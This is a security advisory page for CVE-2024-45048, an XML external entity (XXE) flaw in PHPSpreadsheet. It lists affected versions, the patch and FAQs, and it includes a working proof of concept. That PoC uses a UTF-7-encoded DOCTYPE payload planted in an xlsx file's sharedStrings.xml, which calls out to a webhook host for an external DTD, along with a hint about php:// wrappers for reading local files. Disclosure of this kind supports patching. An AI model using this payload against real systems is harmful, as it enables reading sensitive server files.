high
8.8
CWE
611
Advisory Published
Advisory Published
Updated

CVE-2024-45048: XML External Entity Reference (XXE) in PHPSpreadsheet

First published: Wed Aug 28 2024(Updated: )

### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) ### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. ### PoC 1) Create simple xlsx file 2) Rename xlsx to zip 3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode. 4) Replace `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` to ``` <?xml version="1.0" encoding='UTF-7' standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]> ``` 5) Save `sharedStrings.xml` file and rename zip back to xlsx. 6) Use minimal php code that simply opens this xlsx file: ``` use PhpOffice\PhpSpreadsheet\IOFactory; require __DIR__ . '/vendor/autoload.php'; $spreadsheet = IOFactory::load("file.xlsx"); ``` 7) You will receive the request to your `http://%webhook%/file.dtd` 8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files. ### Impact Read local files ![lfi](https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931)

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
composer/phpoffice/phpspreadsheet>=2.0.0<2.1.1
2.1.1
composer/phpoffice/phpspreadsheet>=2.2.0<2.2.1
2.2.1
composer/phpoffice/phpspreadsheet<1.29.1
1.29.1
PhpSpreadsheet<1.29.1
PhpSpreadsheet>=2.0.0<2.2.1

Remedy

https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2024-45048?

    CVE-2024-45048 is categorized as a critical vulnerability due to its potential for XXE (XML External Entity) attacks and local file inclusion.

  • How do I fix CVE-2024-45048?

    To remediate CVE-2024-45048, upgrade the phpoffice/phpspreadsheet package to version 2.2.1 or higher.

  • What types of attacks are associated with CVE-2024-45048?

    CVE-2024-45048 is associated with XXE and LFI (Local File Inclusion) attacks that can expose sensitive files from the server.

  • Which software versions are affected by CVE-2024-45048?

    CVE-2024-45048 affects PhpSpreadsheet versions before 2.2.1, specifically versions 2.0.0 to 2.1.1 and versions prior to 1.29.1.

  • What are the implications of CVE-2024-45048 for my application?

    Exploitation of CVE-2024-45048 can allow an attacker to read sensitive local files, leading to severe data breaches.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203